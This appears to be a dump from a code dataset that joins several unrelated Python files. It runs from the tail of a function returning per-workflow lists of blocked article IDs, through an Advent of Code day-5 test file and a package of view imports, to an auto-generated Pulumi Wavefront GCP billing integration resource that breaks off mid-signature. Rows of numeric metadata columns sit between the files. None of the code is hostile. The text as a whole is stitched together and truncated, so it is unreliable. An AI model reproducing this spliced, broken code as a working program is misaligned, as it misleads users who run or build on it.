"04969", "04970", "04986", "04995", "04996",
"04997", "04998", "05000", "05007", "05025",
"05031", "05033", "05041", "05048", "05055",
"05060", "05075", "05087", "05105", "05115",
"05116", "05125", "05151", "05161", "05169",
"05178", "05179", "05198", "05216", "05218",
"05244", "05256", "05259", "05269", "05289",
"05290", "05334", "05352", "05375", "05377",
"05394", "05401", "05418", "05419", "05422",
"05427", "05438", "05490", "05504", "05508",
"05553", "05558", "05564", "05570", "05580",
"05597", "05614", "05657", "05663", "05720",
"05770", "05787", "05789", "05816", "05846",
"05896", "05983", "06156", "06193", "06200",
"06235", "06303", "06306", "06351", "06424",
"06430", "06453", "06494", "06656", "06720",
"06740", "06900", "06986"]
elif workflow == "Cengage":
article_blacklist = [
"00003", "00005", "00007", "00011", "00012", "00013", "00031", "00036", "00047",
"00048", "00049", "00051", "00065", "00067", "00068", "00070", "00078", "00090",
"00093", "00102", "00105", "00109", "00116", "00117", "00133", "00160", "00170",
"00171", "00173", "00178", "00181", "00183", "00184", "00190", "00205", "00218",
"00220", "00230", "00231", "00240", "00242", "00243", "00247", "00248", "00260",
"00269", "00270", "00278", "00281", "00286", "00288", "00290", "00291", "00299",
"00301", "00302", "00306", "00308", "00311", "00312", "00321", "00324", "00326",
"00327", "00329", "00333", "00334", "00336", "00337", "00340", "00347", "00348",
"00351", "00352", "00353", "00354", "00358", "00362", "00365", "00367", "00378",
"00380", "00385", "00386", "00387", "00400", "00411", "00415", "00421", "00422",
"00425", "00426", "00429", "00435", "00444", "00450", "00452", "00458", "00459",
"00461", "00467", "00471", "00473", "00475", "00476", "00477", "00481", "00482",
"00488", "00491", "00498", "00499", "00505", "00508", "00515", "00518", "00522",
"00523", "00533", "00534", "00537", "00542", "00558", "00563", "00565", "00569",
"00571", "00572", "00573", "00577", "00590", "00592", "00593", "00594", "00603",
"00605", "00615", "00625", "00626", "00631", "00632", "00633", "00638", "00639",
"00640", "00641", "00642", "00646", "00647", "00648", "00654", "00655", "00658",
"00659", "00662", "00663", "00666", "00668", "00669", "00672", "00675", "00676",
"00683", "00691", "00692", "00699", "00704", "00708", "00710", "00712", "00723",
"00726", "00729", "00731", "00736", "00744", "00745", "00747", "00750", "00757",
"00759", "00762", "00767", "00768", "00772", "00776", "00778", "00780", "00782",
"00785", "00790", "00791", "00792", "00799", "00800", "00801", "00802", "00804",
"00806", "00808", "00813", "00822", "00824", "00825", "00828", "00829", "00842",
"00844", "00845", "00855", "00856", "00857", "00861", "00862", "00863", "00866",
"00868", "00873", "00882", "00884", "00886", "00895", "00899", "00903", "00905",
"00914", "00924", "00926", "00932", "00933", "00940", "00943", "00947", "00948",
"00951", "00953", "00954", "00958", "00960", "00961", "00963", "00966", "00967",
"00969", "00971", "00983", "00992", "00994", "00996", "00999", "01004", "01008",
"01009", "01020", "01029", "01030", "01042", "01045", "01061", "01064", "01067",
"01071", "01074", "01084", "01085", "01086", "01089", "01096", "01098", "01102",
"01104", "01108", "01114", "01115", "01119", "01120", "01123", "01127", "01133",
"01135", "01136", "01138", "01139", "01140", "01149", "01157", "01159", "01160",
"01169", "01179", "01180", "01197", "01201", "01202", "01206", "01211", "01213",
"01214", "01221", "01222", "01228", "01229", "01233", "01234", "01236", "01239",
"01252", "01256", "01257", "01267", "01270", "01273", "01279", "01287", "01289",
"01291", "01293", "01294", "01295", "01296", "01298", "01299", "01305", "01308",
"01310", "01311", "01312", "01319", "01322", "01323", "01326", "01328", "01339",
"01340", "01341", "01345", "01350", "01355", "01369", "01370", "01374", "01381",
"01385", "01386", "01387", "01388", "01402", "01403", "01412", "01414", "01426",
"01428", "01433", "01434", "01438", "01439", "01440", "01456", "01457", "01460",
"01462", "01465", "01469", "01473", "01479", "01481", "01482", "01483", "01488",
"01489", "01494", "01496", "01498", "01501", "01503", "01514", "01515", "01516",
"01519", "01524", "01530", "01535", "01539", "01541", "01557", "01561", "01566",
"01567", "01569", "01574", "01579", "01581", "01584", "01587", "01596", "01597",
"01599", "01603", "01604", "01605", "01607", "01608", "01610", "01612", "01621",
"01623", "01630", "01632", "01633", "01637", "01641", "01658", "01659", "01662",
"01663", "01671", "01680", "01681", "01684", "01694", "01695", "01699", "01700",
"01710", "01715", "01724", "01730", "01738", "01739", "01741", "01749", "01751",
"01754", "01760", "01763", "01775", "01776", "01779", "01808", "01809", "01812",
"01816", "01817", "01820", "01828", "01831", "01832", "01833", "01834", "01839",
"01845", "01846", "01849", "01856", "01857", "01861", "01867", "01873", "01879",
"01883", "01888", "01892", "01893", "01901", "01906", "01911", "01913", "01914",
"01916", "01917", "01926", "01928", "01936", "01939", "01944", "01948", "01949",
"01958", "01963", "01964", "01967", "01968", "01977", "01979", "01982", "01990",
"01993", "01998", "02001", "02008", "02009", "02020", "02024", "02025", "02028",
"02030", "02040", "02041", "02042", "02043", "02046", "02053", "02057", "02061",
"02062", "02069", "02076", "02077", "02078", "02087", "02088", "02094", "02104",
"02105", "02109", "02112", "02115", "02130", "02131", "02137", "02148", "02151",
"02152", "02164", "02171", "02172", "02181", "02184", "02189", "02190", "02196",
"02199", "02200", "02203", "02206", "02208", "02217", "02218", "02224", "02230",
"02236", "02238", "02242", "02245", "02252", "02257", "02260", "02265", "02270",
"02272", "02273", "02277", "02283", "02286", "02289", "02304", "02313", "02322",
"02324", "02349", "02362", "02365", "02369", "02370", "02372", "02375", "02384",
"02386", "02387", "02391", "02394", "02395", "02397", "02403", "02407", "02409",
"02419", "02439", "02440", "02443", "02444", "02445", "02450", "02451", "02475",
"02478", "02481", "02482", "02490", "02501", "02504", "02510", "02511", "02515",
"02516", "02517", "02523", "02525", "02531", "02535", "02536", "02555", "02557",
"02559", "02564", "02565", "02576", "02583", "02589", "02590", "02598", "02615",
"02618", "02619", "02626", "02630", "02634", "02637", "02641", "02653", "02658",
"02663", "02667", "02669", "02670", "02671", "02674", "02676", "02678", "02687",
"02715", "02725", "02726", "02730", "02734", "02736", "02740", "02743", "02747",
"02750", "02755", "02758", "02763", "02772", "02777", "02780", "02784", "02786",
"02791", "02792", "02798", "02805", "02809", "02811", "02812", "02813", "02833",
"02839", "02840", "02844", "02848", "02851", "02854", "02860", "02862", "02863",
"02866", "02869", "02872", "02875", "02882", "02893", "02897", "02904", "02907",
"02910", "02917", "02923", "02935", "02938", "02945", "02948", "02949", "02950",
"02951", "02956", "02963", "02964", "02975", "02978", "02981", "02993", "02996",
"02999", "03005", "03007", "03011", "03023", "03025", "03031", "03032", "03035",
"03043", "03058", "03061", "03068", "03069", "03075", "03077", "03080", "03083",
"03091", "03100", "03104", "03110", "03115", "03116", "03125", "03126", "03128",
"03145", "03146", "03159", "03164", "03176", "03178", "03180", "03185", "03189",
"03191", "03197", "03198", "03205", "03206", "03222", "03229", "03233", "03235",
"03239", "03245", "03251", "03254", "03255", "03256", "03270", "03271", "03273",
"03275", "03282", "03285", "03293", "03297", "03300", "03307", "03311", "03318",
"03342", "03346", "03348", "03351", "03357", "03363", "03371", "03372", "03374",
"03375", "03383", "03385", "03397", "03398", "03399", "03401", "03405", "03406",
"03416", "03421", "03422", "03427", "03430", "03433", "03435", "03440", "03443",
"03445", "03464", "03467", "03468", "03473", "03475", "03476", "03487", "03496",
"03497", "03498", "03502", "03504", "03521", "03522", "03523", "03526", "03528",
"03532", "03542", "03545", "03549", "03553", "03558", "03563", "03564", "03568",
"03573", "03574", "03575", "03579", "03581", "03582", "03583", "03587", "03596",
"03600", "03602", "03604", "03606", "03609", "03613", "03614", "03626", "03635",
"03638", "03640", "03641", "03648", "03650", "03653", "03656", "03658", "03663",
"03665", "03671", "03674", "03676", "03678", "03679", "03680", "03683", "03695",
"03696", "03697", "03701", "03702", "03703", "03706", "03711", "03714", "03720",
"03722", "03724", "03726", "03727", "03728", "03735", "03737", "03743", "03751",
"03753", "03754", "03756", "03764", "03765", "03766", "03772", "03778", "03779",
"03781", "03785", "03790", "03804", "03811", "03819", "03821", "03830", "03842",
"03848", "03851", "03868", "03881", "03883", "03891", "03892", "03895", "03896",
"03908", "03915", "03925", "03939", "03941", "03943", "03949", "03952", "03962",
"03970", "03971", "03977", "03978", "03980", "03981", "03997", "04000", "04006",
"04008", "04014", "04024", "04034", "04037", "04040", "04046", "04047", "04052",
"04057", "04059", "04066", "04069", "04070", "04094", "04105", "04106", "04111",
"04114", "04120", "04121", "04123", "04126", "04132", "04135", "04137", "04147",
"04158", "04165", "04168", "04177", "04180", "04186", "04187", "04193", "04205",
"04207", "04220", "04232", "04234", "04235", "04236", "04246", "04247", "04249",
"04251", "04260", "04263", "04265", "04266", "04273", "04279", "04287", "04288",
"04300", "04316", "04333", "04346", "04353", "04363", "04366", "04371", "04378",
"04379", "04380", "04387", "04389", "04390", "04395", "04402", "04406", "04407",
"04415", "04418", "04433", "04437", "04449", "04463", "04476", "04478", "04489",
"04490", "04491", "04494", "04499", "04501", "04506", "04517", "04525", "04530",
"04531", "04534", "04535", "04543", "04550", "04551", "04553", "04563", "04565",
"04577", "04580", "04581", "04585", "04586", "04591", "04599", "04600", "04601",
"04603", "04605", "04617", "04629", "04630", "04631", "04634", "04645", "04660",
"04664", "04686", "04692", "04693", "04711", "04726", "04729", "04741", "04742",
"04766", "04775", "04779", "04785", "04790", "04801", "04803", "04806", "04811",
"04837", "04851", "04854", "04869", "04871", "04872", "04875", "04876", "04878",
"04883", "04885", "04889", "04901", "04902", "04909", "04919", "04940", "04953",
"04960", "04969", "04970", "04979", "04986", "04995", "04996", "04997", "04998",
"05000", "05003", "05007", "05025", "05031", "05033", "05041", "05042", "05048",
"05055", "05060", "05075", "05087", "05098", "05105", "05115", "05116", "05118",
"05125", "05151", "05154", "05161", "05165", "05166", "05169", "05178", "05179",
"05198", "05216", "05218", "05224", "05242", "05244", "05256", "05259", "05269",
"05279", "05289", "05290", "05291", "05334", "05338", "05352", "05375", "05377",
"05378", "05394", "05401", "05413", "05418", "05419", "05421", "05422", "05423",
"05427", "05438", "05447", "05449", "05457", "05463", "05464", "05472", "05477",
"05490", "05491", "05503", "05504", "05508", "05534", "05544", "05553", "05557",
"05558", "05560", "05564", "05570", "05580", "05597", "05604", "05606", "05608",
"05614", "05635", "05657", "05663", "05701", "05720", "05733", "05770", "05787",
"05789", "05808", "05816", "05826", "05835", "05846", "05849", "05861", "05868",
"05871", "05875", "05896", "05899", "05959", "05983", "06003", "06024", "06034",
"06054", "06068", "06074", "06100", "06132", "06156", "06166", "06179", "06184",
"06193", "06200", "06235", "06250", "06303", "06306", "06346", "06351", "06369",
"06380", "06400", "06412", "06424", "06430", "06453", "06494", "06536", "06557",
"06565", "06633", "06656", "06717", "06720", "06740", "06758", "06782", "06808",
"06837", "06877", "06883", "06900", "06956", "06986", "06995", "07074", "07083",
"07108", "07157", "07204", "07239", "07322", "07364", "07390", "07431", "07482",
"07527", "07532", "07586", "07604"
]
elif workflow == "GoOA":
article_blacklist = []
else:
article_blacklist = []
return article_blacklist
| 73.40275
| 97
| 0.48006
| 3,585
| 37,362
| 4.995537
| 0.359275
| 0.002513
| 0.004523
| 0.003629
| 0.872355
| 0.862583
| 0.847954
| 0.836228
| 0.831761
| 0.828075
| 0
| 0.611617
| 0.239254
| 37,362
| 508
| 98
| 73.547244
| 0.018471
| 0.008244
| 0
| 0.00818
| 0
| 0
| 0.469959
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00409
| false
| 0
| 0
| 0
| 0.00818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
acc9e27950321a8c093397fb1f1f1fa98bac3e8d
| 599
|
py
|
Python
|
day5/test_day5.py
|
chrisb87/advent_of_code_2016
|
668a7c5e3f2aac036dcf0091ca62a47cb0c54ba8
|
[
"Unlicense"
] | 1
|
2016-12-07T20:28:12.000Z
|
2016-12-07T20:28:12.000Z
|
day5/test_day5.py
|
chrisb87/advent_of_code_2016
|
668a7c5e3f2aac036dcf0091ca62a47cb0c54ba8
|
[
"Unlicense"
] | null | null | null |
day5/test_day5.py
|
chrisb87/advent_of_code_2016
|
668a7c5e3f2aac036dcf0091ca62a47cb0c54ba8
|
[
"Unlicense"
] | null | null | null |
import unittest
from day5 import *
class TestDay5Part1(unittest.TestCase):
@unittest.skip("slow")
def test_compute_code_example_input(self):
self.assertEqual(compute_code('abc'), '18f47a30')
@unittest.skip("slow")
def test_compute_code_actual(self):
self.assertEqual(compute_code('ffykfhsq'), 'c6697b55')
class TestDay5Part2(unittest.TestCase):
@unittest.skip("slow")
def test_compute_code_example_input(self):
self.assertEqual(compute_code_2('abc'), '05ace8e3')
@unittest.skip("slow")
def test_compute_code_actual(self):
self.assertEqual(compute_code_2('ffykfhsq'), '8c35d1ab')
| 28.52381
| 58
| 0.774624
| 77
| 599
| 5.766234
| 0.337662
| 0.198198
| 0.144144
| 0.171171
| 0.734234
| 0.734234
| 0.72973
| 0.72973
| 0.72973
| 0.72973
| 0
| 0.04918
| 0.083472
| 599
| 20
| 59
| 29.95
| 0.759563
| 0
| 0
| 0.5
| 0
| 0
| 0.116861
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| false
| 0
| 0.125
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
acdc88402edc131a208f4f50e53e77929a305622
| 145
|
py
|
Python
|
src/accounts/Views/__init__.py
|
samrika25/TRAVIS_HEROKU_GIT
|
bcae6d0422d9a0369810944a91dd03db7df0d058
|
[
"MIT"
] | null | null | null |
src/accounts/Views/__init__.py
|
samrika25/TRAVIS_HEROKU_GIT
|
bcae6d0422d9a0369810944a91dd03db7df0d058
|
[
"MIT"
] | 4
|
2021-03-30T12:35:36.000Z
|
2021-06-10T18:11:24.000Z
|
src/accounts/Views/__init__.py
|
samrika25/TRAVIS_HEROKU_GIT
|
bcae6d0422d9a0369810944a91dd03db7df0d058
|
[
"MIT"
] | 2
|
2021-02-07T16:16:36.000Z
|
2021-07-13T05:26:51.000Z
|
from .LogoutView import *
from .LoginView import *
from .RegisterView import *
from .ResetPasswordView import *
from .ChangePasswordView import *
| 29
| 33
| 0.8
| 15
| 145
| 7.733333
| 0.466667
| 0.344828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131034
| 145
| 5
| 33
| 29
| 0.920635
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.4
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
ace06146409e531320decade0df4e312ca2d39b1
| 23,531
|
py
|
Python
|
sdk/python/pulumi_wavefront/cloud_integration_gcp_billing.py
|
pulumi/pulumi-wavefront
|
1d199d386ee241fa2ef94553e6cae1359ec9ccf6
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2022-02-20T09:48:33.000Z
|
2022-02-20T09:48:33.000Z
|
sdk/python/pulumi_wavefront/cloud_integration_gcp_billing.py
|
pulumi/pulumi-wavefront
|
1d199d386ee241fa2ef94553e6cae1359ec9ccf6
|
[
"ECL-2.0",
"Apache-2.0"
] | 40
|
2020-08-12T08:37:24.000Z
|
2022-03-31T15:51:17.000Z
|
sdk/python/pulumi_wavefront/cloud_integration_gcp_billing.py
|
pulumi/pulumi-wavefront
|
1d199d386ee241fa2ef94553e6cae1359ec9ccf6
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['CloudIntegrationGcpBillingArgs', 'CloudIntegrationGcpBilling']
@pulumi.input_type
class CloudIntegrationGcpBillingArgs:
def __init__(__self__, *,
api_key: pulumi.Input[str],
json_key: pulumi.Input[str],
project_id: pulumi.Input[str],
service: pulumi.Input[str],
additional_tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
force_save: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
service_refresh_rate_in_minutes: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a CloudIntegrationGcpBilling resource.
:param pulumi.Input[str] api_key: API key for Google Cloud Platform (GCP)
:param pulumi.Input[str] json_key: Private key for a Google Cloud Platform (GCP) service account within your project.
The account must be at least granted Monitoring Viewer permissions. This key must be in the JSON format generated by GCP.
:param pulumi.Input[str] project_id: The Google Cloud Platform (GCP) Project Id
:param pulumi.Input[str] service: A value denoting which cloud service this service integrates with
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] additional_tags: A list of point tag key-values to add to every point ingested using this integration
:param pulumi.Input[bool] force_save: Forces this resource to save, even if errors are present
:param pulumi.Input[str] name: The human-readable name of this integration
:param pulumi.Input[int] service_refresh_rate_in_minutes: How often, in minutes, to refresh the service
"""
pulumi.set(__self__, "api_key", api_key)
pulumi.set(__self__, "json_key", json_key)
pulumi.set(__self__, "project_id", project_id)
pulumi.set(__self__, "service", service)
if additional_tags is not None:
pulumi.set(__self__, "additional_tags", additional_tags)
if force_save is not None:
pulumi.set(__self__, "force_save", force_save)
if name is not None:
pulumi.set(__self__, "name", name)
if service_refresh_rate_in_minutes is not None:
pulumi.set(__self__, "service_refresh_rate_in_minutes", service_refresh_rate_in_minutes)
@property
@pulumi.getter(name="apiKey")
def api_key(self) -> pulumi.Input[str]:
"""
API key for Google Cloud Platform (GCP)
"""
return pulumi.get(self, "api_key")
@api_key.setter
def api_key(self, value: pulumi.Input[str]):
pulumi.set(self, "api_key", value)
@property
@pulumi.getter(name="jsonKey")
def json_key(self) -> pulumi.Input[str]:
"""
Private key for a Google Cloud Platform (GCP) service account within your project.
The account must be at least granted Monitoring Viewer permissions. This key must be in the JSON format generated by GCP.
"""
return pulumi.get(self, "json_key")
@json_key.setter
def json_key(self, value: pulumi.Input[str]):
pulumi.set(self, "json_key", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Input[str]:
"""
The Google Cloud Platform (GCP) Project Id
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: pulumi.Input[str]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter
def service(self) -> pulumi.Input[str]:
"""
A value denoting which cloud service this service integrates with
"""
return pulumi.get(self, "service")
@service.setter
def service(self, value: pulumi.Input[str]):
pulumi.set(self, "service", value)
@property
@pulumi.getter(name="additionalTags")
def additional_tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A list of point tag key-values to add to every point ingested using this integration
"""
return pulumi.get(self, "additional_tags")
@additional_tags.setter
def additional_tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "additional_tags", value)
@property
@pulumi.getter(name="forceSave")
def force_save(self) -> Optional[pulumi.Input[bool]]:
"""
Forces this resource to save, even if errors are present
"""
return pulumi.get(self, "force_save")
@force_save.setter
def force_save(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "force_save", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The human-readable name of this integration
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="serviceRefreshRateInMinutes")
def service_refresh_rate_in_minutes(self) -> Optional[pulumi.Input[int]]:
"""
How often, in minutes, to refresh the service
"""
return pulumi.get(self, "service_refresh_rate_in_minutes")
@service_refresh_rate_in_minutes.setter
def service_refresh_rate_in_minutes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "service_refresh_rate_in_minutes", value)
@pulumi.input_type
class _CloudIntegrationGcpBillingState:
def __init__(__self__, *,
additional_tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
api_key: Optional[pulumi.Input[str]] = None,
force_save: Optional[pulumi.Input[bool]] = None,
json_key: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
service: Optional[pulumi.Input[str]] = None,
service_refresh_rate_in_minutes: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering CloudIntegrationGcpBilling resources.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] additional_tags: A list of point tag key-values to add to every point ingested using this integration
:param pulumi.Input[str] api_key: API key for Google Cloud Platform (GCP)
:param pulumi.Input[bool] force_save: Forces this resource to save, even if errors are present
:param pulumi.Input[str] json_key: Private key for a Google Cloud Platform (GCP) service account within your project.
The account must be at least granted Monitoring Viewer permissions. This key must be in the JSON format generated by GCP.
:param pulumi.Input[str] name: The human-readable name of this integration
:param pulumi.Input[str] project_id: The Google Cloud Platform (GCP) Project Id
:param pulumi.Input[str] service: A value denoting which cloud service this service integrates with
:param pulumi.Input[int] service_refresh_rate_in_minutes: How often, in minutes, to refresh the service
"""
if additional_tags is not None:
pulumi.set(__self__, "additional_tags", additional_tags)
if api_key is not None:
pulumi.set(__self__, "api_key", api_key)
if force_save is not None:
pulumi.set(__self__, "force_save", force_save)
if json_key is not None:
pulumi.set(__self__, "json_key", json_key)
if name is not None:
pulumi.set(__self__, "name", name)
if project_id is not None:
pulumi.set(__self__, "project_id", project_id)
if service is not None:
pulumi.set(__self__, "service", service)
if service_refresh_rate_in_minutes is not None:
pulumi.set(__self__, "service_refresh_rate_in_minutes", service_refresh_rate_in_minutes)
@property
@pulumi.getter(name="additionalTags")
def additional_tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A list of point tag key-values to add to every point ingested using this integration
"""
return pulumi.get(self, "additional_tags")
@additional_tags.setter
def additional_tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "additional_tags", value)
@property
@pulumi.getter(name="apiKey")
def api_key(self) -> Optional[pulumi.Input[str]]:
"""
API key for Google Cloud Platform (GCP)
"""
return pulumi.get(self, "api_key")
@api_key.setter
def api_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_key", value)
@property
@pulumi.getter(name="forceSave")
def force_save(self) -> Optional[pulumi.Input[bool]]:
"""
Forces this resource to save, even if errors are present
"""
return pulumi.get(self, "force_save")
@force_save.setter
def force_save(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "force_save", value)
@property
@pulumi.getter(name="jsonKey")
def json_key(self) -> Optional[pulumi.Input[str]]:
"""
Private key for a Google Cloud Platform (GCP) service account within your project.
The account must be at least granted Monitoring Viewer permissions. This key must be in the JSON format generated by GCP.
"""
return pulumi.get(self, "json_key")
@json_key.setter
def json_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "json_key", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The human-readable name of this integration
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
"""
The Google Cloud Platform (GCP) Project Id
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter
def service(self) -> Optional[pulumi.Input[str]]:
"""
A value denoting which cloud service this service integrates with
"""
return pulumi.get(self, "service")
@service.setter
def service(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service", value)
@property
@pulumi.getter(name="serviceRefreshRateInMinutes")
def service_refresh_rate_in_minutes(self) -> Optional[pulumi.Input[int]]:
"""
How often, in minutes, to refresh the service
"""
return pulumi.get(self, "service_refresh_rate_in_minutes")
@service_refresh_rate_in_minutes.setter
def service_refresh_rate_in_minutes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "service_refresh_rate_in_minutes", value)
class CloudIntegrationGcpBilling(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
additional_tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
api_key: Optional[pulumi.Input[str]] = None,
force_save: Optional[pulumi.Input[bool]] = None,
json_key: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
service: Optional[pulumi.Input[str]] = None,
service_refresh_rate_in_minutes: Optional[pulumi.Input[int]] = None,
__props__=None):
"""
Provides a Wavefront Cloud Integration for GCP Billing. This allows GCP Billing cloud integrations to be created,
updated, and deleted.
## Example Usage
```python
import pulumi
import pulumi_wavefront as wavefront
gcp_billing = wavefront.CloudIntegrationGcpBilling("gcpBilling",
api_key="example-api-key",
json_key=\"\"\"{...your gcp key ...}
\"\"\",
project_id="example-gcp-project")
```
## Import
GCP Billing Cloud Integrations can be imported using the `id`, e.g.
```sh
$ pulumi import wavefront:index/cloudIntegrationGcpBilling:CloudIntegrationGcpBilling gcp_billing a411c16b-3cf7-4f03-bf11-8ca05aab898d
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] additional_tags: A list of point tag key-values to add to every point ingested using this integration
:param pulumi.Input[str] api_key: API key for Google Cloud Platform (GCP)
:param pulumi.Input[bool] force_save: Forces this resource to save, even if errors are present
:param pulumi.Input[str] json_key: Private key for a Google Cloud Platform (GCP) service account within your project.
The account must be at least granted Monitoring Viewer permissions. This key must be in the JSON format generated by GCP.
:param pulumi.Input[str] name: The human-readable name of this integration
:param pulumi.Input[str] project_id: The Google Cloud Platform (GCP) Project Id
:param pulumi.Input[str] service: A value denoting which cloud service this service integrates with
:param pulumi.Input[int] service_refresh_rate_in_minutes: How often, in minutes, to refresh the service
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: CloudIntegrationGcpBillingArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Wavefront Cloud Integration for GCP Billing. This allows GCP Billing cloud integrations to be created,
updated, and deleted.
## Example Usage
```python
import pulumi
import pulumi_wavefront as wavefront
gcp_billing = wavefront.CloudIntegrationGcpBilling("gcpBilling",
api_key="example-api-key",
json_key=\"\"\"{...your gcp key ...}
\"\"\",
project_id="example-gcp-project")
```
## Import
GCP Billing Cloud Integrations can be imported using the `id`, e.g.
```sh
$ pulumi import wavefront:index/cloudIntegrationGcpBilling:CloudIntegrationGcpBilling gcp_billing a411c16b-3cf7-4f03-bf11-8ca05aab898d
```
:param str resource_name: The name of the resource.
:param CloudIntegrationGcpBillingArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(CloudIntegrationGcpBillingArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
additional_tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
api_key: Optional[pulumi.Input[str]] = None,
force_save: Optional[pulumi.Input[bool]] = None,
json_key: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
service: Optional[pulumi.Input[str]] = None,
service_refresh_rate_in_minutes: Optional[pulumi.Input[int]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = CloudIntegrationGcpBillingArgs.__new__(CloudIntegrationGcpBillingArgs)
__props__.__dict__["additional_tags"] = additional_tags
if api_key is None and not opts.urn:
raise TypeError("Missing required property 'api_key'")
__props__.__dict__["api_key"] = api_key
__props__.__dict__["force_save"] = force_save
if json_key is None and not opts.urn:
raise TypeError("Missing required property 'json_key'")
__props__.__dict__["json_key"] = json_key
__props__.__dict__["name"] = name
if project_id is None and not opts.urn:
raise TypeError("Missing required property 'project_id'")
__props__.__dict__["project_id"] = project_id
if service is None and not opts.urn:
raise TypeError("Missing required property 'service'")
__props__.__dict__["service"] = service
__props__.__dict__["service_refresh_rate_in_minutes"] = service_refresh_rate_in_minutes
super(CloudIntegrationGcpBilling, __self__).__init__(
'wavefront:index/cloudIntegrationGcpBilling:CloudIntegrationGcpBilling',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
additional_tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
api_key: Optional[pulumi.Input[str]] = None,
